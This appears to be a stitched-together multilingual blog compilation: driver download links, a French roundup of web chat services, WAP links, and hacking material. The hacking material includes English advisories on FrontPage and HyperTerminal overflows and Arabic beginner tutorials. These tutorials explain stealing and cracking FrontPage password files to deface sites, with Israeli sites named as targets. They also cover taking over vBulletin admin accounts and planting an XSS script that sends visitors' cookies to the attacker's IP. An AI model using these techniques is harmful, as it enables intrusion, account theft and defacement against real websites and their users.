Cisco:
http://www.cisco.com/en/US/support/index.html



Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0


Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html

Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/


creative sound:
http://us.creative.com/support/downloads/

direct x home page
http://www.microsoft.com/windows/directx/default.aspx

ati driver home page
http://www.ati.com/support/driver.html
__________________

التصنيفات


vos adresse web sur pc et gsm pour la messagerie instantané IM

bey mr electroman

Meebo & Meebo Rooms

Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.

http://www.meebo.com

Pibb


En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.

http://pibb.com/

Tangler

Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.

https://www.tangler.com/

Lingr


Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.

http://www.lingr.com

Kool IM

koolim

Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.

http://www.koolim.com/

Campfire

Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.

http://campfirenow.com/

Yahoo! Messenger for the web


Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.

http://webmessenger.yahoo.com/

MessengerFX

Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.

http://www10.messengerfx.com/

Iminent

On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.

http://www.iminent.com/

eBuddy

eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.

http://www.ebuddy.com/

3bubbles


A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.

http://www.3bubbles.com/

Tworl


Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.

http://www.tworl.com/

Mabber

Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)

http://www.mabber.com/

Geesee

Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.

http://www.geesee.com/

Plugoo

Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”

http://www.plugoo.com

RadiusIM

Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)

http://www.radiusim.com

Itzle

Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.

http://www.itzle.com

Gabbly

Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.

http://www.gabbly.com

ZohoChat

Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.

http://www.zohochat.com

ثغرة في نظام frontpage extension

mr electroman









COMMAND



FrontPage Server Extensions



SYSTEMS AFFECTED



FrontPage Server Extensions; IIS 4, 5



PROBLEM



There has been several issues with Front Page Server Extensions.

One of them was reported by Internet Security Systems Security

Alert. ISS X-Force is aware of a serious vulnerability that may

allow remote attackers to launch Denial of Service (DoS) attacks

against, or compromise Microsoft Internet Information Server

(IIS) installations. This vulnerability exists in the Visual

Studio Remote Application Deployment (RAD) component of FrontPage

Server Extensions.



Microsoft FrontPage is a Web site design and management

application. The FrontPage Server Extensions (FPSE) package is

included in IIS versions 4.0 and 5.0 to help integrate FrontPage

with IIS. IIS servers may be vulnerable if the Visual Studio RAD

component of FPSE is installed. This component allows Web site

designers who use Microsoft InterDev to actively register and

unregister COM components on the IIS server.



The Visual Studio RAD component includes a vulnerable Dynamic Link

Library (DLL), fp30reg.dll. This DLL does not properly parse long

arguments. Attackers may supply the DLL with an overly long

request and may be able to run arbitrary code or bring down the

server. Any commands executed on the server are executed under

the IUSR_machinename security context, and in certain

circumstances under the System context.



Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS

security team has found also a buffer overflow vulnerability in

Microsoft FrontPage 2000 Server Extension, which can be exploited

to execute arbitrary code by a remote attacker. Microsoft

FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)

File: "fp30reg.dll" that exists a buffer overflow vulnerability.

When fp30reg.dll receives a URL request that is longer than 258

bytes, a stack buffer overflow will occur. Exploiting this

vulnerability successfully, an attacker can remotely execute

arbitrary code on the server running MS FPSE 2000.



In case that fp30reg.dll receives an invalid parameter(method),

it will return an error message:



"The server is unable to perform the method [parameter provided by the user] at this time"



This error message will be saved in a fixed length stack buffer.

fp30reg.dll calls USER32.wsprintfA() to form return message.

Because there is no checkup for the length of data supplied by

the user, the destination buffer can be overwritten. An attacker

can rewrite some important memory address like exception structure

or saved EIP to change program flow.



Format string used by USER32.wsprintfA() is:



HTTP Error 501

NOT IMPLEMENTED



The server is unable to perform the method %s at this time.



It is also saved in stack and its address is at (target buffer

address + 256 bytes), so the format string will be rewritten when

the overflow occurs. The attacker should manage to finish

copying. If an attacker overwrite the buffer with random data,

IIS service will fail. In this case, IIS 5.0 can be automatically

self-restarted, but IIS 4.0 needs to be restarted manually.



Exploiting this vulnerability successfully, an attacker can obtain

the privilege of IWAM_machinename account in IIS 5.0 or Local

SYSTEM account in IIS 4.0 by default.



There is a copy of fp30reg.dll in another directory:



Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin



whose name is fp4areg.dll.



Exploiting some other vulnerabilities like unicode bug, an

attacker will be able to access this file.



Overflow won't occur in case that the provided parameter has only

258 bytes:



$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`



HTTP Error 501

NOT IMPLEMENTED



The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAA
at this time.



In case that it is longer than 258 bytes, an buffer overflow will

occur:



$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`



ErrorThe remote procedure call

failed.



There is a proof of concept code for this issue:



http://www.nsfocus.com/proof/fpse2000ex.c



SOLUTION



ISS X-Force recommends that all Web site administrators review the

appropriate IIS Security Checklist from Microsoft, and verify

that their IIS Web servers have been configured securely. These

documents outline how to correctly configure an externally facing

IIS Web server. IIS servers that have been configured securely,

using the Checklists, are not vulnerable to many of the recent

and widely publicized remote IIS exploits.



The IIS Security Checklists are available here:



http://www.microsoft.com/technet/security/iischk.asp

http://www.microsoft.com/technet/security/iis5chk.asp



Patch for Microsoft Windows NT version 4.0:



http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038



For Microsoft Windows 2000 Professional, Server and Advanced

Server:



http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727



For more information on this vulnerability, please refer to the

Microsoft Security Bulletin at:



http://www.microsoft.com/technet/security/bulletin/MS01-035.asp



Basically, installing MS01-035 causes the IIS MMC to close when

you click on the server extensions tab under Windows 2000

Advanced Server on SP2 (with all current hotfixes). Uninstalling

MS01-035 fixes the problem, but opens up the security hole. When

the new patch is available, MS will re-release their bulletin.

ثغرة Front Page



الكاتب : ^SpY^



الاختراق عن طريق ثغرة Front page



________________________________________



أولا :

.......قبل قرائتك للموضوع يجب أن يكون لديك فكرة ولو بسيطة عن :

1- Front page Server Extensions

2- ثغرات الفرونت بيدج و ليس كيفية استعمالها

3- الموضوع للمبتدئين فاذا لم تكن مبتدأ ... فأنصحك بعدم تضييع وقتك معه



نخش في الموضوع:

طبعا ثغرات الفرونت بيدج تكون موجودة في الأنظمة التي يدعم سيرفراتها الFront page , وهذه الثغرات تمكن المخترق من الوصول لملف

الuser name و الpassword الخاص بالAdmin بتاع الموقع .

ولعلك تتسائل ما هذه الملفات ؟ ... حسننا تكون الملفات على هذا النحو والتي تحتوي علىuser name و password الخاص بالAdmin :

Administrator.pwd

Author.pwd

Service.pwd وغالبا تكون الكلمة السرية في هذا المجلد , والذي هو متفرع من _Vti_pvt .



.....طبعا كلكم عارفين الحجات دي .. بس ممكن بعضكم ما قدرش يخترق بيها عشان مافهمش كويس من دروس غير .......المهم أنا هاشرحلكم درس عملي من A to Z للاختراق عن طريق الثغرة دي .

كنا قلنا ان الثغرة غالبا بتكون هنا www.site.com/_vti_pvt/_service.pwd , طب ممكن واحد يقول طب أنا جربت اكتب كدة مع مواقع كتيرة و بيطلعلي error أو Forbidien .....المهم ممكن الAdmin يكون عامل security شوية على الملف ده ..... طيب عشان تجرب وتنفذ هتتبع التالي:

ادخل على الموقع دة

www.altavista.com

وبعدين اكتب في الSearch الكلام دة Link:_Service.pwd أو اكتب Link:_vti_pvt/_service.pwd

المهم هيطلعلك نتايج بالهبل و معظمها تعاني من الثغرة دي , مثال http://www.soi-rp.com/_vti_pvt/ ادخل هنا , هيظهرلك صفحة وفيها الحجات دي :







Parent Directory

-





-











.......... المهم خش على Service.pwd هتلاقي حاجة زي كدة : # -FrontPage- orechron:zjcZSlimQERyw

orechron ده الuser name

zjcZSlimQERyw ودي الpassword بس ماتجربهاش عشان دي مشفرة ....طيب عشان تفكها هتحتاج لjohn the ripper ممكن تحملها من هنا openwall.com المهم لما تحمل الأداة هتلاقي مجلدين run و doc والمهم هوه run بالنسبة لطيرقة العمل هاتكون كالتالي .... هاتلاقي ملف عندك في الجهاز اسمو command موجود في System32 انسخه وضعه في المجلد run .... وبعدين تحطorechron:zjcZSlimQERyw في ملف txt وليكن باسم password .....طيب افتح command واكتب الامرده <john -i:all password.txt

وبعد مايخلص البرنامج هتلاقي الpassword الحقيقية هنا john.pot

كدة خلاص ... وصلنا للختام وهوه انك تصمم صفحة بالفرونت بيدج وتكتب فيها Hacked by ^SpY^

وتعمل pubish web هايطلب username و password هاتكتبهم و..... و مبروك عليك الاختراق .



و عموما أنصحكم بالبحث هنا عشان دي مواقع يهوديه تبحث بطريقة الSpiders يعني Random Hacking :

achla.co.il

maven.co.il

iguide.co.il

____________________________

طرق معرفة واختراق المواقع التي تدعم FrontPage

كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT - Unix



1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟



بعدة طرق ولن أذكر إلا الأسهل:



- بالذهاب إلى موقع netcraft

http://www.netcraft.com/

وكتابة اسم الموقع وبعد البحث سوف يظهر

mod_frontpage/x

x=(رقم الإصدار الخاص بالفرونت بيج)

- عن طريق إضافة جملة

vti_inf.html_/

بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/

نضيف الجملة ليصبح بهذه الطريقة

http://www.almodammer.com/_vti_inf.html

وبعدها اضغط Enter

وراح يطلعلك في أول الصفحة هذه الكلمة

Frontpage Configuration Information

أي قد تم تثبيت مجلدات وبرامج الفرونت بيج

- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا

بإضافة

vti_cnf_/

بعد عنوان الموقع كهذا المثال:

http://www.almodammer.com/_vti_cnf

واضغط زر الفأرة الأيمن واختار

source المصدر

وابحث عن

vti_generator:Programe

حيث

Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به



--------------------------------------------------



2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك

يعني وعلى سبيل المثال

http://www.almodammer.com/

يدعم fontpage طيب نذهب إلى ملف vti_pvt_

كذا يعني

http://www.almodammer.com/_vti_pvt

وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

=============

Adminstrator.pwd

Adminstrators.pwd

Service.pwd

Users.pwd

User.pwd

Author.pwd

=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود

username : passwd

اسم المستخدم والباسوورد

يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password

وهذا مضمون الملف

operator:hi9LHn9wAMuKM

حيث اسم المستخدم : operator

الباسوورد المشفرة هي:hi9LHn9wAMuKM



ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره

وهذا يتم ببرامج كثير

=(Crack Jack)=

=(John The Ripper)=



راح نستخدم الأفضل والأكثر تداولا وهو

John The Ripper

لتحميل البرنامج من هذا الموقع::

http://www.openwall.com/john



كيف تفك التشفير بهذا البرنامج



أول شي تروح تنقل البرنامج إلى مجلد

:c

بعدين تفتح مجلد RUN

وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها

إذهب إلى

ابدأ start

تشغيل run

اكتب الأمر

command

اضغط على Enter وبعدها راح يفتح

إطار الـDoS

اذهب إلى مجلد RUN

وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر

..cd

حتى توصل

<:c

بعدين اكتب

cd john

اضغط على Enter

وراح يظهر لك بهذا الشكل

<c:john

واكتب

cd RUN

وبتدخل المجلد ليصبح بهذه الطريقة

<c:/john/RUN

ألحين نكتب أوامر برنامج John The Ripper

وهي

====

john -i:all passd.txt

--------------------------

يبحث لك عن جميع الأنواع والاحتمالات



====

john -i:Alpha passwd.txt

----------------------------------

يبحث عن الأحرف الصغيرة



====

john -i: Digits passwd.txt

----------------------------------

يبحث عن الأرقام



====

john -i:single passwd.txt

---------------------------------

أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم



--------------------------------------------------------------------------------

وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى

john.pot

الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها

--------------------------------------------------------------------------------



إنت ألحين مستريح عندك username والـpassword

وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/





frontpage

بعدين

file وتذهب إلى

open web وتضيف

الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك



من FTP

وعليك ببرامج الـFTP المنتشرة

كالـws-ftp

والـpro ftp

والمزيد ...

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك



======================================



وألحين أكيد تبون تجربون على موقع أقولكم روحوا google

http://www.google.com/

واكتبوا في إطار البحث

vti_pvt_/

وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة



وعندك محرك بحث

http://www.altavista.com/

تكتب في محرك البحث

link:service.pwd

أو..

link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها

DETECTER VOTRE ADRESSE IP

bey mr electroman
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm

ثغرة في Hyper Terminal في نظم Msn

Electroman please your attention

COMMAND

HyperTerminal

SYSTEMS AFFECTED

Win2000 (all versions), Me, 98 and 98SE

PROBLEM

The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.

Example:

telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/

The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.

SOLUTION

Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.

A patch is available to fix this vulnerability. Please read the
Security Bulletin:

http://www.microsoft.com/technet/security/bulletin/ms00-079.asp

for information on obtaining this patch.

ثغره تخترق نصف المواقع ونصف منتديات النت

هذا الملخّص غير متوفِّر. يُرجى النقر هنا لعرض المشاركة.

طريقة اختراق المنتديات

طريقة اختراق المنتديات


الكاتب : لا اعرف عنه اى شئ


اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u...etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...VALI...39;').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :



you typed in the wrong password


9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

اختراق منتديات الـــ vBulletin

بسم الله الرحمن الرحيم

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write('<img
src="http://my_ip_address/'+document.cookie+'">';


مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb







ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54







20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


السريفر الشخصي

http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي

Imaginer je réalise voila mr elctroman

exclusivités

après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D

imedia free links ---imedia sites gratuits---

voila une collection des sites web es marche a 100% avec imedia présenter par electroman

wap.meditel.ma.wapamp.com/users9/0katana

wap.meditel.ma.www.goalzz.com

wap.meditel.ma.wap.esato.com/xhtml

wap.meditel.ma.wanawap.com

wap.meditel.ma.waptrick.com

wap.meditel.ma.gamawap.com

wap.meditel.ma.www.3gforfree.com/mobile

wap.meditel.ma.mobile.itsmy.com/umts/index.php3

wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index

wap.meditel.ma.m.radar.net

wap.meditel.ma.m.taptap.net

wap.meditel.ma.wap.gamoku.com

